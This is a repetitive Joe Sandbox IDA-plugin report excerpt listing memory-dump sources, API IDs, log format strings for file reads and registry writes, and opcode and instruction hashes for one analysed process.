                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: d1e4840a67c95ef5a18a090a670f96f31748756a2db79bf59e93df6eef5b13b8
                                                                    • Instruction ID: 78166d0d8a01eb0fd521c170b04adb0262f7d392b0b24d786895fe33c28cd1df
                                                                    • Opcode Fuzzy Hash: d1e4840a67c95ef5a18a090a670f96f31748756a2db79bf59e93df6eef5b13b8
                                                                    • Instruction Fuzzy Hash: 93F0BE23F09E0249FA529A06B4407BE12412F60370E0901B1CD2D2B2E1EE3DA8878208
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 990a221dfb3cb8aeeb7552017c1aa3505dc4d2da84d681610558626fdd00577d
                                                                    • Instruction ID: 5e36432166459c1223ea2b41f05623d7ee7d51c3fef118a13bf4f7f1a6c99294
                                                                    • Opcode Fuzzy Hash: 990a221dfb3cb8aeeb7552017c1aa3505dc4d2da84d681610558626fdd00577d
                                                                    • Instruction Fuzzy Hash: 6EF0BE23B09E0249FA529A06B4407BE12411F60374E0901B2CD2D6B6E1EE3DAC878208
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 3de8bbb853dfdf7682b0827993847d962f4b612fe79d9d3c87e993878a22dcee
                                                                    • Instruction ID: 04afcb6d773d3b176d47330c1eea07e3c9741799fd754d110b7561d7b3804af4
                                                                    • Opcode Fuzzy Hash: 3de8bbb853dfdf7682b0827993847d962f4b612fe79d9d3c87e993878a22dcee
                                                                    • Instruction Fuzzy Hash: FFF0BE23F09E0249FA529A06B4407BE12411F60374E0901B1CD2D2B2E1EE3DAC878208
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: dac8eb63fc54e1f6c4a3f30d4fbec8f1a2d25ac8b79450a3fb76d79718e9249a
                                                                    • Instruction ID: 2cfad29a25d025878c5124cd53bef9a082a48deddfa73b40465188ec2dca256f
                                                                    • Opcode Fuzzy Hash: dac8eb63fc54e1f6c4a3f30d4fbec8f1a2d25ac8b79450a3fb76d79718e9249a
                                                                    • Instruction Fuzzy Hash: 00F0BE23B09E0249FA529A06B4417BE12411F60374E0901B1CD3D2B2E2EE3DAC878208
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: cc99faef8402a9311c25be1ff5315f91a79a7d6813b935e0675048b13d9bd8e3
                                                                    • Instruction ID: 8d5bf5e3610cb8bdb82ec85c1d9cc3ea00b71e768511f85e28fd516a867290f1
                                                                    • Opcode Fuzzy Hash: cc99faef8402a9311c25be1ff5315f91a79a7d6813b935e0675048b13d9bd8e3
                                                                    • Instruction Fuzzy Hash: A6F0BE23B09E0649FA529A06B4407BE12411F60374E0902B1CD2D2B2E2EE3DAC878208
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: d1e4840a67c95ef5a18a090a670f96f31748756a2db79bf59e93df6eef5b13b8
                                                                    • Instruction ID: 78166d0d8a01eb0fd521c170b04adb0262f7d392b0b24d786895fe33c28cd1df
                                                                    • Opcode Fuzzy Hash: d1e4840a67c95ef5a18a090a670f96f31748756a2db79bf59e93df6eef5b13b8
                                                                    • Instruction Fuzzy Hash: 93F0BE23F09E0249FA529A06B4407BE12412F60370E0901B1CD2D2B2E1EE3DA8878208
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 3830d5c9bcfa35e30f395fa6a2070ccb228ab19e6bc5d0af7ce4f20ee2511ab0
                                                                    • Instruction ID: c3ea6ab3f89881f6f0e380f75cda5592a8aff1677aa6880eb0105e5d3bb5b5e4
                                                                    • Opcode Fuzzy Hash: 3830d5c9bcfa35e30f395fa6a2070ccb228ab19e6bc5d0af7ce4f20ee2511ab0
                                                                    • Instruction Fuzzy Hash: 85F0BE23B09E0649FA529A06B4407BE12411F60370E0902B1CD2D2B7E2EE3DAC879208
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: b233857000ff338559f6e4fdf725ba4cf6212be17939af09ef085f7bb0742ba9
                                                                    • Instruction ID: c3fe13e7254e37ad19198d9b04d9b8475c44ad19c2a43833ad9eb24fa534eca1
                                                                    • Opcode Fuzzy Hash: b233857000ff338559f6e4fdf725ba4cf6212be17939af09ef085f7bb0742ba9
                                                                    • Instruction Fuzzy Hash: A1F0BE23F09E0249FA529A06B4407BE12412F60370E0901B1CD2C2B7E1EE3DA8879208
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 558382feb5cb909b06dd18dc82b80ede7c11bccf5cce58ebe0d1e603f10e5164
                                                                    • Instruction ID: 3302f5c9e145f8f764d2460a8d9ed803361fe0d3757a4dc5b7a49dd6416057ea
                                                                    • Opcode Fuzzy Hash: 558382feb5cb909b06dd18dc82b80ede7c11bccf5cce58ebe0d1e603f10e5164
                                                                    • Instruction Fuzzy Hash: ECF0BE23B09E0249FA529A06B4417BE12411F60370E0901B1CD3D2B7E2EE3DAC879208
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                    • API String ID: 1001908780-3542721600
                                                                    • Opcode ID: 970c09d0dcd5ea34f1a46dc12fd34a0edf7691e351c06cd1f2e05a77389e8ae6
                                                                    • Instruction ID: 200be1dddbaa2830efe77fefce95834de1e14b57fd2cc1f3b9328bdc4c21d2b6
                                                                    • Opcode Fuzzy Hash: 970c09d0dcd5ea34f1a46dc12fd34a0edf7691e351c06cd1f2e05a77389e8ae6
                                                                    • Instruction Fuzzy Hash: F1E09262A0CE0680E7519B82FC004BD3219EF807A0F4441B9D94E465B09E2CE589E301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                    • API String ID: 1001908780-3542721600
                                                                    • Opcode ID: 4bb574007704d611733c35ed3aec0597b95f3c12bec7a3ab01b222fd3b9032a5
                                                                    • Instruction ID: bbf5e35d0ffd49ee9e470a948460f96f0cdefe381f76ef98bfc0156643ca264e
                                                                    • Opcode Fuzzy Hash: 4bb574007704d611733c35ed3aec0597b95f3c12bec7a3ab01b222fd3b9032a5
                                                                    • Instruction Fuzzy Hash: 27E09262A0CE0681E7119B82BC004BD3219EF807A0F4401B9D94E465B09E2CE985E301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                    • API String ID: 1001908780-3542721600
                                                                    • Opcode ID: ff28b797b5508f40563d36ad7b99ab8af3a4bf2d9dee5be4e765f66e119b214b
                                                                    • Instruction ID: 373518fb08e75ad8cbd3c489cab1625e0208648f6dbdeae458327bf86d11d1bc
                                                                    • Opcode Fuzzy Hash: ff28b797b5508f40563d36ad7b99ab8af3a4bf2d9dee5be4e765f66e119b214b
                                                                    • Instruction Fuzzy Hash: EBE09262A0CE0680E7119B82BC004BD321DEF807A0F4401B9D94E465B09E2CEA85E302
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                    • API String ID: 1001908780-3542721600
                                                                    • Opcode ID: 65008b44c4f079c0671a940b285b04cbb2c56ce62817bf01ff20aa7ae2b78fcb
                                                                    • Instruction ID: 56f8f7a6ae9182a22cd319cdc6e60220cc0dd4387abdf59d6c1787c9ed7f288a
                                                                    • Opcode Fuzzy Hash: 65008b44c4f079c0671a940b285b04cbb2c56ce62817bf01ff20aa7ae2b78fcb
                                                                    • Instruction Fuzzy Hash: 29E09262A0CE0680E7119B82BC004BD3219EF807A0F4401B9D94E465B0AE2CE985E301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                    • API String ID: 1001908780-3542721600
                                                                    • Opcode ID: 2aff72e031674af7b39c3b0c2b33f8ac3c6bebc49797e51394ce98bc8fad6267
                                                                    • Instruction ID: 01120babfc0dfd29caf8c18de3acfa919df223e7932e7b319a33f8d9915672c4
                                                                    • Opcode Fuzzy Hash: 2aff72e031674af7b39c3b0c2b33f8ac3c6bebc49797e51394ce98bc8fad6267
                                                                    • Instruction Fuzzy Hash: CBE09262A0CE0680E7119B82FC005BD3219EF807A0F4401B9D94E465B09E2CE589E301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                    • API String ID: 1001908780-3542721600
                                                                    • Opcode ID: 68af31fda512251a4e7095c64759633a77901c269178442763b3f75b46be7b38
                                                                    • Instruction ID: 5a87436a39ac2109275d0248fda966a6ec0329d9a75aa17ecaf284b34ff2a135
                                                                    • Opcode Fuzzy Hash: 68af31fda512251a4e7095c64759633a77901c269178442763b3f75b46be7b38
                                                                    • Instruction Fuzzy Hash: 19E09212B0CE16C8F5119B06B8000B92600AB607B5F0002B1EE2E2A6B6DE2CD9859308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                    • API String ID: 1001908780-3542721600
                                                                    • Opcode ID: b15d2ccd7713901b812b792a66e2f8fc9b9e8b1f5e597a7986e6778bc4d5d9eb
                                                                    • Instruction ID: 3e36e2b463ced23977bb13ea15cd45586c67dd2e8c0ddccf9078d78ed89061b7
                                                                    • Opcode Fuzzy Hash: b15d2ccd7713901b812b792a66e2f8fc9b9e8b1f5e597a7986e6778bc4d5d9eb
                                                                    • Instruction Fuzzy Hash: 89E09212A0CE16C8F5119B06FC001B92600AB607B1F0001B1EE2E2A5B6DE2CD5899308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                    • API String ID: 1001908780-3542721600
                                                                    • Opcode ID: 3240549721cbf0bfa7b4d65ab79497177ef46608b14afe113a87adda5e44bb4c
                                                                    • Instruction ID: 3e29237696016c9cc5206928b53976fb15fea219d398d4d8b48fbc3a98c295cc
                                                                    • Opcode Fuzzy Hash: 3240549721cbf0bfa7b4d65ab79497177ef46608b14afe113a87adda5e44bb4c
                                                                    • Instruction Fuzzy Hash: 79E09212A0CE16C8F6119B02F8000B92600AB607B5F0042B1EA6E2A6B6DE2CD9899308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                    • API String ID: 1001908780-3542721600
                                                                    • Opcode ID: 0d3f0688ba3eb7ac108ce3e1ea9f224433ea670d95ad91698c67122ec0279f11
                                                                    • Instruction ID: 0972c8fe7c2d90b36c6eb011e5722d1070ae5b82b78e4ed888f1d8ee8fc208a4
                                                                    • Opcode Fuzzy Hash: 0d3f0688ba3eb7ac108ce3e1ea9f224433ea670d95ad91698c67122ec0279f11
                                                                    • Instruction Fuzzy Hash: ACE09212A0CE16C8F5119B06BC000B92604EB607B5F0001B2EE2E2A6B6DE2CD9859308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
